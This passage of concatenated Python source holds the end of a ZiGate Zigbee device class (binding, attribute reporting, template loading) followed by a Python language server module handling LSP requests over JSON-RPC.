self._zigate.reporting_request(self.addr, endpoint_id,
0x0008, (0x0000, 0x20))
if 0x0009 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0009')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0009)
if 0x000f in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x000f')
self._zigate.bind_addr(self.addr, endpoint_id, 0x000f)
self._zigate.reporting_request(self.addr, endpoint_id,
0x000f, (0x0055, 0x10))
if 0x0101 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0101')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0101)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0101, (0x0000, 0x30))
if 0x0102 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0102')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0102)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0102, (0x0007, 0x20))
if 0x0201 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0201')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0201)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0000, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0002, 0x18))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0008, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0012, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0014, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x001C, 0x30))
if 0x0300 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0300')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
elif endpoint['device'] in (0x010D, 0x0210):
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# (0x0007, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
else: # 0x0200
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
if 0x0400 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0x0400')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0400)
if 0xFC00 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0xFC00')
self._zigate.bind_addr(self.addr, endpoint_id, 0xFC00)
if 0x0702 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0x0702')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0702)
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0702, (0x0000, 0x25))
@staticmethod
def from_json(data, zigate_instance=None):
d = Device(zigate_instance=zigate_instance)
d.info = data.get('info', {})
d.genericType = data.get('generictype', '')
d.discovery = data.get('discovery', '')
d.name = data.get('name', '')
for ep in data.get('endpoints', []):
if 'attributes' in ep: # old version
LOGGER.debug('Old version found, convert it')
for attribute in ep['attributes'].values():
endpoint_id = attribute['endpoint']
cluster_id = attribute['cluster']
data = {'attribute': attribute['attribute'],
'data': attribute['data'],
}
d.set_attribute(endpoint_id, cluster_id, data)
else:
endpoint = d.get_endpoint(ep['endpoint'])
endpoint['profile'] = ep.get('profile', 0)
endpoint['device'] = ep.get('device', 0)
endpoint['in_clusters'] = ep.get('in_clusters', [])
endpoint['out_clusters'] = ep.get('out_clusters', [])
for cl in ep['clusters']:
cluster = Cluster.from_json(cl, endpoint, d)
endpoint['clusters'][cluster.cluster_id] = cluster
if 'power_source' in d.info: # old version
d.info['power_type'] = d.info.pop('power_source')
if 'manufacturer' in d.info: # old version
d.info['manufacturer_code'] = d.info.pop('manufacturer')
if 'rssi' in d.info: # old version
d.info['lqi'] = d.info.pop('rssi')
d._avoid_duplicate()
return d
def to_json(self, properties=False):
r = {'addr': self.addr,
'info': self.info,
'endpoints': [{'endpoint': k,
'clusters': list(v['clusters'].values()),
'profile': v['profile'],
'device': v['device'],
'in_clusters': v['in_clusters'],
'out_clusters': v['out_clusters']
} for k, v in self.endpoints.items()],
'generictype': self.genericType,
'discovery': self.discovery,
'name': self.name
}
if properties:
r['properties'] = list(self.properties)
return r
def __str__(self):
if self.name:
return self.name
name = self.get_property_value('type', '')
manufacturer = self.get_property_value('manufacturer', 'Device')
return '{} {} ({}) {}'.format(manufacturer, name, self.info.get('addr'), self.info.get('ieee'))
def __repr__(self):
return self.__str__()
@property
def addr(self):
return self.info['addr']
@property
def ieee(self):
ieee = self.info.get('ieee')
if ieee is None:
LOGGER.error('IEEE is missing for %s, please pair it again !', self.addr)
return ieee
@property
def rssi(self): # compat
return self.lqi
@rssi.setter
def rssi(self, value): # compat
self.lqi = value
@property
def lqi(self):
return self.info.get('lqi', 0)
@lqi.setter
def lqi(self, value):
self.info['lqi'] = value
@property
def last_seen(self):
return self.info.get('last_seen')
@property
def battery_percent(self):
percent = self.get_property_value('battery_percent')
if not percent:
percent = 100
if self.info.get('power_type') == 0:
power_source = self.get_property_value('power_source')
if power_source is None:
power_source = 3
battery_voltage = self.get_property_value('battery_voltage')
if power_source == 3: # battery
power_source = 3.1
if power_source and battery_voltage:
power_end = 0.91 * power_source
percent = (battery_voltage - power_end) * 100 / (power_source - power_end)
if percent > 100:
percent = 100
return percent
@property
def rssi_percent(self): # compat
return self.lqi_percent
@property
def lqi_percent(self):
return round(100 * self.lqi / 255)
def get_type(self, wait=True):
typ = self.get_value('type')
if typ is None:
for endpoint in self.endpoints:
if 0 in self.endpoints[endpoint]['in_clusters'] or not self.endpoints[endpoint]['in_clusters']:
self._zigate.read_attribute_request(self.addr,
endpoint,
0x0000,
[0x0004, 0x0005]
)
if 0 in self.endpoints[endpoint]['in_clusters']:
break
if not wait or not self.endpoints:
return
# wait for type
t1 = monotonic()
while self.get_value('type') is None:
sleep(0.01)
t2 = monotonic()
if t2 - t1 > WAIT_TIMEOUT:
LOGGER.warning('No response waiting for type')
return
typ = self.get_value('type')
return typ
def refresh_device(self, full=False, force=False):
to_read = {}
if not force:
last_1h = datetime.datetime.now() - datetime.timedelta(hours=1)
last_1h = last_1h.strftime('%Y-%m-%d %H:%M:%S')
if self.last_seen and self.last_seen > last_1h:
LOGGER.debug('Last seen less than an hour, ignoring refresh')
return
if full:
for attribute in self.attributes:
k = (attribute['endpoint'], attribute['cluster'])
if k not in to_read:
to_read[k] = []
to_read[k].append(attribute['attribute'])
else:
endpoints_list = list(self.endpoints.items())
for endpoint_id, endpoint in endpoints_list:
# tries to read the type as a kind of ping
if 0x0000 in endpoint['in_clusters']:
k = (endpoint_id, 0x0000)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0005)
if 0x0006 in endpoint['in_clusters']:
k = (endpoint_id, 0x0006)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x0008 in endpoint['in_clusters']:
k = (endpoint_id, 0x0008)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x000f in endpoint['in_clusters']:
k = (endpoint_id, 0x000f)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0055)
if 0x0102 in endpoint['in_clusters']:
k = (endpoint_id, 0x0102)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0007)
if 0x0201 in endpoint['in_clusters']:
k = (endpoint_id, 0x0201)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
to_read[k].append(0x0002)
to_read[k].append(0x0008)
to_read[k].append(0x0012)
to_read[k].append(0x0014)
to_read[k].append(0x001C)
if 0x0300 in endpoint['in_clusters']:
k = (endpoint_id, 0x0300)
if k not in to_read:
to_read[k] = []
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
elif endpoint['device'] in (0x010D, 0x0210):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
to_read[k].append(0x0007)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
to_read[k].append(0x0007)
else: # 0x0200
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
if 0x0702 in endpoint['in_clusters']:
k = (endpoint_id, 0x0702)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
for k, attributes in to_read.items():
endpoint, cluster = k
self._zigate.read_attribute_request(self.addr,
endpoint,
cluster,
attributes)
def discover_device(self):
self._zigate.discover_device(self.addr)
def identify_device(self, time_sec=5):
'''
send identify command
sec is time in second
'''
ep = list(self.endpoints.keys())
ep.sort()
if ep:
endpoint = ep[0]
else:
endpoint = 1
self._zigate.identify_send(self.addr, endpoint, time_sec)
def __setitem__(self, key, value):
self.info[key] = value
def __getitem__(self, key):
return self.info[key]
def __delitem__(self, key):
return self.info.__delitem__(key)
def get(self, key, default):
return self.info.get(key, default)
def __contains__(self, key):
return self.info.__contains__(key)
def __len__(self):
return len(self.info)
def __iter__(self):
return self.info.__iter__()
def items(self):
return self.info.items()
def keys(self):
return self.info.keys()
# def __getattr__(self, attr):
# return self.info[attr]
def update(self, device):
'''
update from other device
'''
self._lock_acquire()
self.info.update(device.info)
self._merge_endpoints(device.endpoints)
self.genericType = self.genericType or device.genericType
# self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self._lock_release()
def _merge_endpoints(self, endpoints):
for endpoint_id, endpoint in endpoints.items():
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = endpoint
else:
myendpoint = self.endpoints[endpoint_id]
if 'clusters' not in myendpoint:
myendpoint['clusters'] = {}
myendpoint['profile'] = endpoint.get('profile') or myendpoint.get('profile', 0)
myendpoint['device'] = endpoint.get('device') or myendpoint.get('device', 0)
myendpoint['in_clusters'] = endpoint.get('in_clusters') or myendpoint.get('in_clusters', [])
myendpoint['out_clusters'] = endpoint.get('out_clusters') or myendpoint.get('out_clusters', [])
for cluster_id, cluster in endpoint['clusters'].items():
if cluster_id not in myendpoint['clusters']:
myendpoint['clusters'][cluster_id] = cluster
else:
mycluster = myendpoint['clusters'][cluster_id]
for attribute in cluster.attributes.values():
mycluster.update(attribute)
def update_info(self, info):
self._lock_acquire()
self.info.update(info)
self._lock_release()
def get_endpoint(self, endpoint_id):
self._lock_acquire()
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = {'clusters': {},
'profile': 0,
'device': 0,
'in_clusters': [],
'out_clusters': [],
}
self._lock_release()
return self.endpoints[endpoint_id]
def get_cluster(self, endpoint_id, cluster_id):
endpoint = self.get_endpoint(endpoint_id)
self._lock_acquire()
if cluster_id not in endpoint['clusters']:
cluster = get_cluster(cluster_id, endpoint, self)
endpoint['clusters'][cluster_id] = cluster
self._lock_release()
return endpoint['clusters'][cluster_id]
def set_attribute(self, endpoint_id, cluster_id, data):
added = False
lqi = data.pop('lqi', 0)
if lqi > 0:
self.info['lqi'] = lqi
self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self.missing = False
# delay fast change for cluster 0x0006
if DETECT_FASTCHANGE and cluster_id == 0x0006 and data['attribute'] == 0x0000:
now = monotonic()
k = (endpoint_id, cluster_id, data['attribute'])
last_change = self._fast_change.setdefault(k, 0)
self._fast_change[k] = now
if (now - last_change) < DELAY_FASTCHANGE:
LOGGER.debug('Fast change detected, delay it for %s %s %s', endpoint_id, cluster_id, data)
self._delay_change(endpoint_id, cluster_id, data)
return
cluster = self.get_cluster(endpoint_id, cluster_id)
self._lock_acquire()
r = cluster.update(data)
if r:
added, attribute = r
if 'expire' in attribute:
self._set_expire_timer(endpoint_id, cluster_id,
attribute['attribute'],
attribute['expire'])
self._avoid_duplicate()
self._lock_release()
if not r:
return
changed = self.get_attribute(endpoint_id,
cluster_id,
attribute['attribute'], True)
if cluster_id == 0 and attribute['attribute'] == 5:
if not self.discovery:
self.load_template()
if added:
dispatch_signal(ZIGATE_ATTRIBUTE_ADDED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': changed})
else:
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': changed})
self._handle_quirks(changed)
return added, attribute['attribute']
def _handle_quirks(self, attribute):
"""
Handle special attributes
"""
if 'name' not in attribute:
return
if attribute['name'] == 'xiaomi':
LOGGER.debug('Handle special xiaomi attribute %s', attribute)
values = attribute['value']
# Battery voltage
data_map = [(0x01, 0x0001, 0x0020, values[1] / 100.),]
# TODO: Handle more special attribute
if self.get_type(False) == 'lumi.sensor_motion.aq2':
data_map += [(0x01, 0x0406, 0x0000, values[100]),
(0x01, 0x0400, 0x0000, values[11])
]
elif self.get_type(False) == 'lumi.sensor_magnet.aq2':
data_map += [(0x01, 0x0006, 0x0000, values[100]),
]
elif self.get_type(False) == 'lumi.sensor_ht':
data_map += [(0x01, 0x0402, 0x0000, values[100]),
(0x01, 0x0405, 0x0000, values[101]),
]
elif self.get_type(False) == 'lumi.weather':
data_map += [(0x01, 0x0402, 0x0000, values[100]),
(0x01, 0x0405, 0x0000, values[101]),
(0x01, 0x0403, 0x0000, int(values[102] / 100)),
(0x01, 0x0403, 0x0010, values[102] / 10),
]
elif self.get_type(False) == 'lumi.ctrl_neutral1':
data_map += [(0x02, 0x0006, 0x0000, values[100]),
]
elif self.get_type(False) == 'lumi.ctrl_neutral2':
data_map += [(0x02, 0x0006, 0x0000, values[100]),
(0x03, 0x0006, 0x0000, values[101]),
]
for endpoint_id, cluster_id, attribute_id, value in data_map:
self.set_attribute(endpoint_id, cluster_id, {'attribute': attribute_id, 'data': value})
def _delay_change(self, endpoint_id, cluster_id, data):
'''
Delay attribute change
'''
timer = threading.Timer(DELAY_FASTCHANGE * 2,
functools.partial(self.set_attribute,
endpoint_id,
cluster_id,
data))
timer.setDaemon(True)
timer.start()
def _set_expire_timer(self, endpoint_id, cluster_id, attribute_id, expire):
LOGGER.debug('Set expire timer for %s-%s-%s in %s', endpoint_id,
cluster_id,
attribute_id,
expire)
k = (endpoint_id, cluster_id, attribute_id)
timer = self._expire_timer.get(k)
if timer:
LOGGER.debug('Cancel previous Timer %s', timer)
timer.cancel()
timer = threading.Timer(expire,
functools.partial(self._reset_attribute,
endpoint_id,
cluster_id,
attribute_id))
timer.setDaemon(True)
timer.start()
self._expire_timer[k] = timer
def _reset_attribute(self, endpoint_id, cluster_id, attribute_id):
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id)
value = attribute['value']
if 'expire_value' in attribute:
new_value = attribute['expire_value']
elif 'type' in attribute:
new_value = attribute['type']()
else:
new_value = type(value)()
attribute['value'] = new_value
attribute['data'] = new_value
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id,
True)
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': attribute})
def get_attribute(self, endpoint_id, cluster_id, attribute_id,
extended_info=False):
if endpoint_id in self.endpoints:
endpoint = self.endpoints[endpoint_id]
if cluster_id in endpoint['clusters']:
cluster = endpoint['clusters'][cluster_id]
attribute = cluster.get_attribute(attribute_id)
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id,
'addr': self.addr}
attr.update(attribute)
return attr
return attribute
@property
def attributes(self):
'''
list all attributes including endpoint and cluster id
'''
return self.get_attributes(True)
def get_attributes(self, extended_info=False):
'''
list all attributes
including endpoint and cluster id
'''
attrs = []
endpoints = list(self.endpoints.keys())
endpoints.sort()
for endpoint_id in endpoints:
endpoint = self.endpoints[endpoint_id]
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if extended_info:
attr = {'endpoint': endpoint_id, 'cluster': cluster_id}
attr.update(attribute)
attrs.append(attr)
else:
attrs.append(attribute)
return attrs
def set_attributes(self, attributes):
'''
load list created by attributes()
'''
for attribute in attributes:
endpoint_id = attribute.pop('endpoint')
cluster_id = attribute.pop('cluster')
self.set_attribute(endpoint_id, cluster_id, attribute)
def get_property(self, name, extended_info=False):
'''
return attribute matching name
'''
for endpoint_id, endpoint in self.endpoints.items():
for cluster_id, cluster in endpoint.get('clusters', {}).items():
for attribute in cluster.attributes.values():
if attribute.get('name') == name:
if extended_info:
attr = {'endpoint': endpoint_id,
'cluster': cluster_id}
attr.update(attribute)
return attr
return attribute
def get_property_value(self, name, default=None):
'''
return attribute value matching name
'''
prop = self.get_property(name)
if prop:
return prop.get('value', default)
return default
def get_value(self, name, default=None):
'''
return attribute value matching name
shorter alias of get_property_value
'''
return self.get_property_value(name, default)
@property
def properties(self):
'''
return well known attribute list
attribute with friendly name
'''
props = []
for endpoint in self.endpoints.values():
for cluster in endpoint.get('clusters', {}).values():
for attribute in cluster.attributes.values():
if 'name' in attribute:
props.append(attribute)
return props
def receiver_on_when_idle(self):
mac_capability = self.info.get('mac_capability')
if mac_capability:
return mac_capability[-3] == '1'
return False
def need_discovery(self):
'''
return True if device need to be discovered
because of missing important information
'''
need = False
LOGGER.debug('Check Need discovery %s', self)
if not self.discovery:
self.load_template()
if not self.get_property_value('type'):
LOGGER.debug('Need discovery : no type')
need = True
if not self.ieee:
LOGGER.debug('Need discovery : no IEEE')
need = True
if not self.endpoints:
LOGGER.debug('Need discovery : no endpoints')
need = True
for endpoint in self.endpoints.values():
if endpoint.get('device') is None:
LOGGER.debug('Need discovery : no device id')
need = True
if endpoint.get('in_clusters') is None:
LOGGER.debug('Need discovery : no clusters list')
need = True
return need
def _avoid_duplicate(self):
'''
Rename attribute if needed to avoid duplicate
'''
properties = []
for attribute in self.attributes:
if 'name' not in attribute:
continue
if attribute['name'] in properties:
attribute['name'] = '{}{}'.format(attribute['name'],
attribute['endpoint'])
attr = self.get_attribute(attribute['endpoint'],
attribute['cluster'],
attribute['attribute'])
attr['name'] = attribute['name']
properties.append(attribute['name'])
def __get_template_filename(self):
typ = self.get_type()
if typ and typ != 'unsupported':
return typ.replace(' ', '_').replace('/', '_')
manufacturer_code = self.info.get('manufacturer_code')
if not manufacturer_code:
return None
filename = '{}'.format(manufacturer_code)
for endpoint_id, endpoint in self.endpoints.items():
filename += '_{}-{}-{}'.format(endpoint_id, endpoint.get('profile'), endpoint.get('device'))
return filename
def has_template(self):
template_filename = self.__get_template_filename()
if not template_filename:
LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
return
path = os.path.join(BASE_PATH, 'templates', template_filename + '.json')
return os.path.exists(path)
def load_template(self):
template_filename = self.__get_template_filename()
if not template_filename:
LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
return
path = os.path.join(BASE_PATH, 'templates', template_filename + '.json')
success = False
LOGGER.debug('Try loading template %s', path)
if os.path.exists(path):
try:
with open(path) as fp:
template = json.load(fp)
device = Device.from_json(template)
self.update(device)
success = True
except Exception:
LOGGER.error('Failed to load template for {}'.format(template_filename))
LOGGER.error(traceback.format_exc())
else:
LOGGER.info('No template found for {}'.format(template_filename))
if self.need_report:
self._bind_report()
if success:
self.discovery = 'templated'
dispatch_signal(ZIGATE_DEVICE_UPDATED,
self._zigate, **{'zigate': self._zigate,
'device': self})
return success
def generate_template(self, dirname='~'):
'''
Generate template file
'''
template_filename = self.__get_template_filename()
if not template_filename:
LOGGER.warning('Neither type (modelIdentifier) nor manufacturer_code for device {}'.format(self.addr))
return
dirname = os.path.expanduser(dirname)
path = os.path.join(dirname, template_filename + '.json')
jdata = json.dumps(self, cls=DeviceEncoder)
jdata = json.loads(jdata)
del jdata['addr']
del jdata['discovery']
for key in ('id', 'addr', 'ieee', 'lqi', 'last_seen', 'max_rx', 'max_tx', 'max_buffer'):
if key in jdata['info']:
del jdata['info'][key]
for endpoint in jdata.get('endpoints', []):
for cluster in endpoint.get('clusters', []):
cluster_id = cluster['cluster']
if cluster_id == 0: # we only keep attribute 4, 5, 7 for cluster 0x0000
cluster['attributes'] = [a for a in cluster.get('attributes', [])
if a.get('attribute') in (4, 5, 7)]
for attribute in cluster.get('attributes', []):
keys = list(attribute.keys())
for key in keys:
if key in ('attribute', 'inverse'):
continue
if key == 'data' and cluster_id == 0:
continue
del attribute[key]
with open(path, 'w') as fp:
json.dump(jdata, fp, cls=DeviceEncoder,
sort_keys=True, indent=4, separators=(',', ': '))
@property
def need_report(self):
return self.info.get('need_report', True)
def set_assumed_state(self, assumed_state=True):
self.info['assumed_state'] = assumed_state
@property
def assumed_state(self):
'''
return True if it has assumed state
'''
return self.info.get('assumed_state', False)
@property
def groups(self):
'''
return groups
'''
return self._zigate.get_group_for_addr(self.addr)
|
python_ls.py | # Copyright 2017 Palantir Technologies, Inc.
import logging
import socketserver
import threading
from jsonrpc.dispatchers import MethodDispatcher
from jsonrpc.endpoint import Endpoint
from jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
self.delegate.start()
def start_tcp_lang_server(bind_addr, port, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': handler_class}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class)
try:
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile, check_parent_process)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
doc = self.workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=self.workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',']
},
'textDocumentSync': lsp.TextDocumentSyncKind.INCREMENTAL,
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspace = Workspace(rootUri, self._endpoint)
self.config = config.Config(rootUri, initializationOptions or {}, processId)
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if self._check_parent_process and processId is not None:
def watch_parent_process(pid):
# exist when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive", pid)
self.m_exit()
log.debug("parent process %s is still alive", pid)
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
watching_thread.daemon = True
watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
pass
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
if doc_uri in self.workspace.documents:
self.workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved)))
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
self.workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
self.workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
for change in contentChanges:
self.workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
